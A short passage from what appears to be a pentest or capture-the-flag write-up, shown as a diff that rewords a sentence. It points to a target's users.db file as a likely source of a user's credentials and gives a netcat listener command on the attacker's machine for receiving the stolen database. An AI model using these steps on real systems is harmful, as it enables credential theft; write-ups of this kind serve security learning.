Pentest Writeups | Hugo Beaulieu

 USER=app

-I find /home/app/app/instance/users.db interesting, if the gael user has configured the app, his credentials might be in there.
+The most interesting finding is /home/app/app/instance/users.db - if the gael user configured the application, their credentials might be stored there.

 nc -lvp 9999 > users.db # My machine